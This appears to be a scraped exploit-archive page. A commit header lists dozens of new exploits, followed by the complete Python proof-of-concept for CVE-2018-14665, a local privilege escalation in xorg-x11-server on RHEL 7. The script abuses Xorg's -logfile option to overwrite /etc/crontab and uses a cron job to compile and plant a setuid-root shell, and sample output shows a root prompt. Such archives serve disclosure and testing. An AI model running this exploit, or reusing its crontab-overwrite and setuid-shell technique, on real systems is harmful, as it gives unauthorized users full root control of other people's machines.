3a7153b2ac
24 changes to exploits/shellcodes CuteFTP Mac 3.1 - Denial of Service (PoC) Evince 3.24.0 - Command Injection Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode) xorg-x11-server < 1.20.1 - Local Privilege Escalation Data Center Audit 2.6.2 - 'username' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal Paroiciel 11.20 - 'tRecIdListe' SQL Injection Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting Paroiciel 11.20 - 'tRecIdListe' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection The Don 1.0.1 - 'login' SQL Injection Facturation System 1.0 - 'modid' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection GPS Tracking System 2.12 - 'username' SQL Injection ServerZilla 1.0 - 'email' SQL Injection Nominas 0.27 - 'username' SQL Injection CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting Surreal ToDo 0.6.1.2 - SQL Injection Surreal ToDo 0.6.1.2 - Local File Inclusion Alienor Web Libre 2.0 - SQL Injection Musicco 2.0.0 - Arbitrary Directory Download Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin) Tina4 Stack 1.0.3 - SQL Injection / Database File Download Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin) Easyndexer 1.0 - Arbitrary File Download ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin) Gumbo CMS 0.99 - SQL Injection Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload) Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin) Webiness Inventory 2.3 - SQL Injection SIPve 0.0.2-R19 - SQL Injection Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
89 lines
No EOL
2.8 KiB
Python
Executable file
89 lines
No EOL
2.8 KiB
Python
Executable file
# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
|
|
# Date: 2018-11-07
|
|
# Exploit Author: @bolonobolo
|
|
# Vendor Homepage: https://www.x.org/
|
|
# Version: 1.19.5
|
|
# Tested on: RHEL 7.3 && 7.5
|
|
# CVE : CVE-2018-14665
|
|
# Explanation
|
|
# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user
|
|
# has to be logged in trought console at the moment the PE script launched.
|
|
# In fact during the logged in session of the legitimate non-root user,
|
|
# a file with the name of the non-root user will be created in the /var/run/console folder.
|
|
# With that file present, the same non-root user can launch a Xorg command via SSH.
|
|
#
|
|
# Usage: $ python poc.py
|
|
# $ python poc.py
|
|
# [*] Waiting for bolo to connect to the console
|
|
# [*] OK --> bolo console opened
|
|
# [*] Building root shell wait 2 minutes
|
|
# [*] crontab overwritten
|
|
#
|
|
# ... cut Xorg output ...
|
|
#
|
|
# [*] Xorg killed
|
|
# (II) Server terminated successfully (0). Closing log file.
|
|
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
|
|
# sh-4.2# id && whoami
|
|
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
|
|
# root
|
|
# sh-4.2#
|
|
|
|
|
|
#!/usr/bin/python
|
|
import os
|
|
import getpass
|
|
import subprocess
|
|
|
|
userList = []
|
|
path="/var/run/console/"
|
|
|
|
def getWhoami():
|
|
return getpass.getuser()
|
|
|
|
def getConsole(path):
|
|
p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
|
|
(console, err) = p.communicate()
|
|
consoleList = str.splitlines(console)
|
|
return consoleList
|
|
|
|
def payload():
|
|
f = open("/tmp/payload", "w")
|
|
payload = ("cp /bin/sh /usr/local/bin/shell\n"
|
|
"echo \"#include <stdio.h> \" > /tmp/shell.c\n"
|
|
"echo \"#include <stdlib.h>\" >> /tmp/shell.c\n"
|
|
"echo \"#include <sys/types.h>\" >> /tmp/shell.c\n"
|
|
"echo \"#include <unistd.h>\" >> /tmp/shell.c\n"
|
|
"echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
|
|
"gcc /tmp/shell.c -o /usr/local/bin/shell\n"
|
|
"chmod 4777 /usr/local/bin/shell\n")
|
|
f.write(payload)
|
|
|
|
def executePayload():
|
|
os.system("chmod +x /tmp/payload")
|
|
os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &")
|
|
print "[*] crontab overwritten"
|
|
os.system("sleep 5")
|
|
os.system("pkill Xorg")
|
|
print "[*] Xorg killed"
|
|
os.system("sleep 120")
|
|
return
|
|
|
|
def main():
|
|
whoami = getWhoami()
|
|
print "[*] Waiting for " + whoami + " to connect to the console"
|
|
i = 0
|
|
while (i == 0):
|
|
consoleList = getConsole(path)
|
|
for user in consoleList:
|
|
if user == whoami :
|
|
print "[*] OK --> " + user + " console opened"
|
|
i = 1
|
|
print "[*] Building root shell wait 2 minutes"
|
|
payload()
|
|
executePayload()
|
|
print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
|
|
os.system("/usr/local/bin/shell")
|
|
|
|
if __name__ == '__main__':
|
|
main() |